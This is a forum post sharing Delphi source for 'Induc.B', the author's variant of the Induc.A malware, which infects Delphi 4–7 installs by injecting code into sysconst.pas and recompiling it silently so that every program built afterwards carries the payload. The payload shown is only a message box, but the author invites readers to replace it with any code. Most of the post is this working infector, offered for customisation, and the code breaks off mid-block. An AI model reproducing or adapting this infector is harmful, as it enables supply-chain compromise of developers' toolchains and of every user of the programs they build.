The most Delphi Coders should know Induc.A, its one of the first Malwares who can modify the compiler in a way that the Compiler itself reproduces the Malware again.
I just analyzed Induc.A and realized how it works, so I wrote a second Version of it, which does not respread itself again.
This version just shows an MessageBox with "Infected by Induc.B" in EVERY App you compile with Delphi 4-7, but you can easily customize it.
{ Coder: Slayer616,Induc-Coder Version: Induc.B History: 19.05.2010 - First Try This is a first, non-selfspreading Version of Induc! Like you should see on "InfectionMessage" i just use a simple MessageBox for the Infection, but you are able to customize that just by editing the constant with your Delphi Code! } program prjIndux; uses windows,classes; const InfectionMessage:string = 'uses windows;' + #13#10 + 'begin' + #13#10 + 'MessageBoxA(0,pchar(''Infected by Induc.B''),pchar(''By Slayer616''),0);' + #13#10 + 'end.'; //Taken from Delphi Praxis function FileToString(const FileName: string): AnsiString; var fs: TFileStream; Len: Integer; begin fs := TFileStream.Create(FileName, $0000 or $0020); try Len := fs.Size; SetLength(Result, Len); if Len > 0 then fs.ReadBuffer(Result[1], Len); finally fs.Free; end; end; Procedure StringToFile(const FileName, Str: string); var fs: TFileStream; Len: Integer; begin fs := TFileStream.Create(FileName, fmcreate); try Len := Length(Str); fs.Write(Str[1], Len); finally fs.Free; end; end; Function WriteInfection(sPath:string):boolean; var sPos:Integer; sTempStr:string; begin result := false; sTempStr :=FileToString(sPath + '\lib\sysconst.pas'); if sTempStr = '' then exit; sPos := pos('implementation',sTempStr); if sPos = 0 then exit; sPos := sPos + 15; sTempStr := copy(sTempstr,1,sPos); sTempstr := sTempstr + InfectionMessage; StringToFile(sPath + '\lib\sysconst.pas',sTempStr); result := true; end; Function CompileInfectedSysconst(sPath:string):boolean; var SI:TStartupInfo; PI:TProcessInformation; begin fillchar(SI,sizeof(SI),0); SI.cb:=sizeof(SI); SI.dwFlags:=STARTF_USESHOWWINDOW; SI.wShowWindow:=SW_HIDE; result := CreateProcess(nil,pchar(sPath + '\bin\dcc32.exe' +' '+ sPath +'\lib\sysconst.pas'),nil,nil,false,NORMAL_PRIORITY_CLASS,nil,nil,SI,PI); if result then WaitForSingleObject(PI.hProcess,INFINITE) end; Function InfectSysconst(sPath:string):boolean; begin Result := true; If CopyFile(Pchar(sPath + '\source\rtl\sys\SysConst.pas'), Pchar(sPath + '\lib\sysconst.pas'),false) = false then begin Result := false; Exit; end; If WriteInfection(sPath) = false then begin Result := false; Exit; end; If CompileInfectedSysconst(sPath) = false then begin Result := false; Exit; end; If DeleteFile(pchar(sPath + '\lib\sysconst.pas')) = false then begin Result := false; Exit; end; end; Function BackUp(sPath:string):Boolean; begin Result := MoveFile(pchar(sPath+'\lib\sysconst.dcu'),pchar(sPath+'\lib\sysconst.bak')); end; var cVersion:char; c:array [1..255] of char; i:integer; sTemp,sSysconst:string; k:HKEY; begin MessageBoxA(0,Pchar('Welcome to Induc.B' + #13#10 + 'Welcome to the Sysconst Infector!' + #13#10 + 'I will now try to find the Compiler and the Sysconst.pas...'),'',0); for cVersion := '4' to '7' do begin if RegOpenKeyEx(HKEY_LOCAL_MACHINE,pchar('Software\Borland\Delphi\'+ cVersion + '.0'),0,KEY_READ,k)=0 then begin i:=255; if RegQueryValueEx(k,'RootDir',nil,@i,@c,@i)=0 then begin sTemp := ''; i:=1; //Copy Array of Char into String while c[i]<>#0 do begin sTemp := sTemp + c[i]; inc(i); end; sSysconst := sTemp ; MessageBoxA(0,Pchar('Delphi Version found: ' + cVersion + '.0' + #13#10 + 'Compilerpath: ' + sTemp + '\bin\dcc32.exe' + #13#10 + 'Sysconst.pas: ' + sSysconst + '\source\rtl\sys\SysConst.pas' + #13#10 + #13#10 + 'Now starting Backup of original Sysconst.dcu...'),pchar('WIN!'),0); If Backup(sSysconst) = false then begin MessageBoxA(0,Pchar('Failed to backup Sysconst!' + #13#10 + 'Cancelling Process...'),Pchar('Error!'),0); Exit; end; MessageBoxA(0,Pchar('Backup completed!' + #13#10 + 'Backupfile: ' + sSysconst +'\lib\sysconst.bak' + #13#10 + #13#10 + 'Now infecting Sysconst...'),'',0); If InfectSysconst(sSysconst) then begin MessageBoxA(0,pchar('You are now infected by Induc.B' + #13#10 + 'For Desinfection just replace Sysconst.Bak with Sysconst.dcu in: ' + sSysconst +'\lib\sysconst.bak'),'',0);
Отредактировано Kido (2010-05-30 21:20:11)